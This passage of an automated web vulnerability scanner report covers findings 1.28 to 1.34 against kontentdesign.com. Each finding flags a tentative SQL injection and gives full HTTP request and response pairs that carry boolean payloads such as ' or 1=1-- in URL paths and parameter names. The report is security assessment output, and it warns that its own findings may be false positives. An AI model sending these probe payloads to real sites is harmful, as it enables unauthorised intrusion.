GET /templates/kontent11/css26624147'%20or%201%3d1--%20/reset.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:04:55 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 570

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /templates/kontent11/css26624147' or 1=1-- /reset.css
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /templates/kontent11/css26624147'%20or%201%3d2--%20/reset.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:05:05 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 566

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /templates/kontent11/css26624147' or 1=2-- /reset.css was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.28. http://kontentdesign.com/templates/kontent11/css/reset.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://kontentdesign.com
Path:   /templates/kontent11/css/reset.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 13324620'%20or%201%3d1--%20 and 13324620'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /templates/kontent11/css/reset.css13324620'%20or%201%3d1--%20 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:06:52 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 570

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /templates/kontent11/css/reset.css13324620' or 1=1--
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /templates/kontent11/css/reset.css13324620'%20or%201%3d2--%20 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:07:02 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 566

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /templates/kontent11/css/reset.css13324620' or 1=2-- was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.29. http://kontentdesign.com/templates/kontent11/css/reset.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://kontentdesign.com
Path:   /templates/kontent11/css/reset.css

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 15058242%20or%201%3d1--%20 and 15058242%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /templates/kontent11/css/reset.css?115058242%20or%201%3d1--%20=1 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 03:08:21 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 551

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /templates/kontent11/css/reset.css
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /templates/kontent11/css/reset.css?115058242%20or%201%3d2--%20=1 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:08:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Last-Modified: Thu, 13 Jan 2011 07:46:42 GMT
Accept-Ranges: bytes
Cache-Control: max-age=1209600
Expires: Tue, 08 Feb 2011 03:08:32 GMT
Vary: Accept-Encoding
Content-Type: text/css
Content-Length: 2771

/* Copyright (C) 2007 - 2011 YOOtheme GmbH, YOOtheme Proprietary Use License (http://www.yootheme.com/license) */

/*
* reset
*/



body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset,input,textarea,p,blockquote,th,td {
   margin: 0;
   padding: 0;
}

fieldset, img { border: 0; }


a:focus { outline: none; }


body { overflow-y: scroll; }

/*
* default values
*/

p {
   margin-top: 10px;
   margin-bottom: 15px;
}


ul, ol, dl {
   margin: 10px 0;
   padding-left: 30px
}

dl { margin: 10px 0; }
dd { padding-left: 40px; }


td, th { padding: 1px; }


a:link, a:visited { text-decoration: none; }
a:hover { text-decoration: underline; }


fieldset {
   margin: 10px 0 10px 0;
   padding: 0 10px 10px 10px;
   border: 1px solid #c8c8c8;
}

legend {
   padding: 0 10px 0 10px;
   background: #ffffff;
}

form div { margin: 10px 0 10px 0; }

textarea { padding: 1px 0 1px 5px; }

option { padding: 0 0 1px 5px; }

input[type='hidden'] { display: none; }

input[type='text'],
input[type='password'] { padding: 1px 0 1px 5px; }

button,
input[type='button'],
input[type='submit'] {
   padding: 2px 4px 2px 1px;
   line-height: 100%;
}

input[type='button'],
input[type='submit'],
input[type='checkbox'],
input[type='image'],
input[type='radio'],
input[type='reset'],
select,
button { cursor: pointer; }


textarea,
input[type='text'],
input[type='password'],
select {
   border: 1px solid #c8c8c8;
   background: #ffffff;
}


textarea:hover,
input[type='text']:hover,
input[type='password']:hover,
select:hover { border-color: #aaaaaa; }


textarea:focus,
input[type='text']:focus,
input[type='password'
...[SNIP]...

1.30. http://kontentdesign.com/templates/kontent11/css/typography.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://kontentdesign.com
Path:   /templates/kontent11/css/typography.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 19643837'%20or%201%3d1--%20 and 19643837'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /templates19643837'%20or%201%3d1--%20/kontent11/css/typography.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:02:03 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 575

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /templates19643837' or 1=1-- /kontent11/css/typography.css
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /templates19643837'%20or%201%3d2--%20/kontent11/css/typography.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:02:04 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 571

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /templates19643837' or 1=2-- /kontent11/css/typography.css was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.31. http://kontentdesign.com/templates/kontent11/css/typography.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://kontentdesign.com
Path:   /templates/kontent11/css/typography.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 16071338'%20or%201%3d1--%20 and 16071338'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /templates/kontent1116071338'%20or%201%3d1--%20/css/typography.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:03:51 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 575

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /templates/kontent1116071338' or 1=1-- /css/typography.css
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /templates/kontent1116071338'%20or%201%3d2--%20/css/typography.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:04:01 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 571

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /templates/kontent1116071338' or 1=2-- /css/typography.css was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.32. http://kontentdesign.com/templates/kontent11/css/typography.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://kontentdesign.com
Path:   /templates/kontent11/css/typography.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 15857804'%20or%201%3d1--%20 and 15857804'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /templates/kontent11/css15857804'%20or%201%3d1--%20/typography.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:05:48 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 575

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /templates/kontent11/css15857804' or 1=1-- /typography.css
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /templates/kontent11/css15857804'%20or%201%3d2--%20/typography.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:05:49 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 571

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /templates/kontent11/css15857804' or 1=2-- /typography.css was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.33. http://kontentdesign.com/templates/kontent11/css/typography.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://kontentdesign.com
Path:   /templates/kontent11/css/typography.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 51594661'%20or%201%3d1--%20 and 51594661'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /templates/kontent11/css/typography.css51594661'%20or%201%3d1--%20 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:07:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 575

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /templates/kontent11/css/typography.css51594661' or 1=1--
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /templates/kontent11/css/typography.css51594661'%20or%201%3d2--%20 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:07:46 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 571

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /templates/kontent11/css/typography.css51594661' or 1=2-- was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.34. http://kontentdesign.com/templates/kontent11/css/typography.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://kontentdesign.com
Path:   /templates/kontent11/css/typography.css

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 19760934%20or%201%3d1--%20 and 19760934%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /templates/kontent11/css/typography.css?119760934%20or%201%3d1--%20=1 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 03:09:05 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 556

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /templates/kontent11/css/typography.css
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

